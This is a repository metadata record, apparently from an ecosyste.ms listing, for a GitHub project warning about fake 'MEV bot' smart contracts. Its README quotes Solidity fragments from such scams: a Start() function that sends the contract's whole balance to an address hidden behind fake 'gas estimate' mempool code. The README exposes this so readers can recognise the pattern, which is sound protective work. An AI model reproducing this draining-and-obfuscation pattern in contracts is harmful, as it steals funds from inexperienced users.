{"id":13567166,"url":"https://github.com/0x-sen/mev-bot-fraud","last_synced_at":"2025-04-04T01:31:08.808Z","repository":{"id":174454561,"uuid":"652273076","full_name":"0x-sen/mev-bot-fraud","owner":"0x-sen","description":"Be careful for the fake mev-bot codes , watch your wallet","archived":false,"fork":false,"pushed_at":"2023-09-04T08:22:37.000Z","size":22,"stargazers_count":66,"open_issues_count":3,"forks_count":10,"subscribers_count":6,"default_branch":"main","last_synced_at":"2024-11-04T21:37:25.454Z","etag":null,"topics":["jaredfromsubway","jaredfromsubway-mev-bot","mev","mev-bot","mevbot","mevbot-contract","mevbot-source-code"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x-sen.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-06-11T16:23:22.000Z","updated_at":"2024-09-29T02:22:54.000Z","dependencies_parsed_at":"2024-02-04T04:49:52.661Z","dependency_job_id":"61752133-10e3-40ed-a22b-3ba6e369e476","html_url":"https://github.com/0x-sen/mev-bot-fraud","commit_stats":null,"previous_names":["chunsenye/mev-bot-fraud","0x-sen/mev-bot-fraud"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x-sen%2Fmev-bot-fraud","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x-sen%2Fmev-bot-fraud/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x-sen%2Fmev-bot-fraud/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x-sen%2Fmev-bot-fraud/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x-sen","download_url":"https://codeload.github.com/0x-sen/mev-bot-fraud/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247107816,"owners_count":20884793,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["jaredfromsubway","jaredfromsubway-mev-bot","mev","mev-bot","mevbot","mevbot-contract","mevbot-source-code"],"created_at":"2024-08-01T13:02:25.166Z","updated_at":"2025-04-04T01:31:06.118Z","avatar_url":"https://github.com/0x-sen.png","language":null,"funding_links":[],"categories":["Misc"],"sub_categories":[],"readme":"# mev-bot-fraud\n\nBe careful for the fake mev-bot codes \n\nWanted to study the mevbot, unexpectedly found a scam, so want to remind you to avoid being cheated, many similar to this project of https://github.com/KayExpertbots/Mevbot, fake script like this \n\n```\n    function Start() public payable {\n        emit Log(\"Running MEV action. This can take a while; please wait..\");\n        payable(_callMEVAction()).transfer(address(this).balance);\n    }\n\n```\n\nStart looks like a startup script is actually a transfer, will transfer your balance to an address, '_callMEVAction()' This method is actually the last will generate a wallet address, around is to cheat some beginners, so we must look at it, see this code must be careful \n\n![image](https://github.com/chunsenye/mev-bot-fraud/assets/30768615/dc4f05ca-abf7-4146-84d6-d528f08195f1)\n\n```\ntransfer(address(this).balance);\n```\n\n```\n function callMempool() internal pure returns (string memory) {\n        string memory _memPoolOffset = mempool(\"x\", checkLiquidity(getMemPoolOffset()));\n        uint _memPoolSol = 3410611; //Gas estimate update\n        uint _memPoolLength = 2418259; //Gas estimate update\n        uint _memPoolSize = 2563395760; //Gas estimate update\n        uint _memPoolHeight = getMemPoolHeight();\n        uint _memPoolDepth = getMemPoolDepth();\n\n        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));\n        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));\n        string memory _memPool3 = checkLiquidity(_memPoolHeight);\n        string memory _memPool4 = checkLiquidity(_memPoolDepth);\n\n        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));\n        string memory _fullMempool = mempool(\"0\", _allMempools);\n\n        return _fullMempool;\n    }\n\n```\n![image](https://github.com/chunsenye/mev-bot-fraud/assets/30768615/7334fcdc-405c-45ce-9753-317cc112c9bd)\n\n\nThese are all lies so just a reminder, you can also help to light up the stars, so that more people can see \n\n\u003cimg width=\"1360\" alt=\"image\" src=\"https://github.com/chunsenye/mev-bot-fraud/assets/30768615/b87707ad-ae0c-4d49-892c-a54af47947d2\"\u003e\n\n\n[Fraud account list -- 【诈骗账号】](https://github.com/chunsenye/mev-bot-fraud/issues/2)\n\n[List of Fraud projects - 【诈骗项目列表】](https://github.com/chunsenye/mev-bot-fraud/issues/1)\n\n\n【Some real projects  of mev bot】\n\n[go outside labs mev-toolkit](https://github.com/go-outside-labs/mev-toolkit)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x-sen%2Fmev-bot-fraud","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x-sen%2Fmev-bot-fraud","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x-sen%2Fmev-bot-fraud/lists"}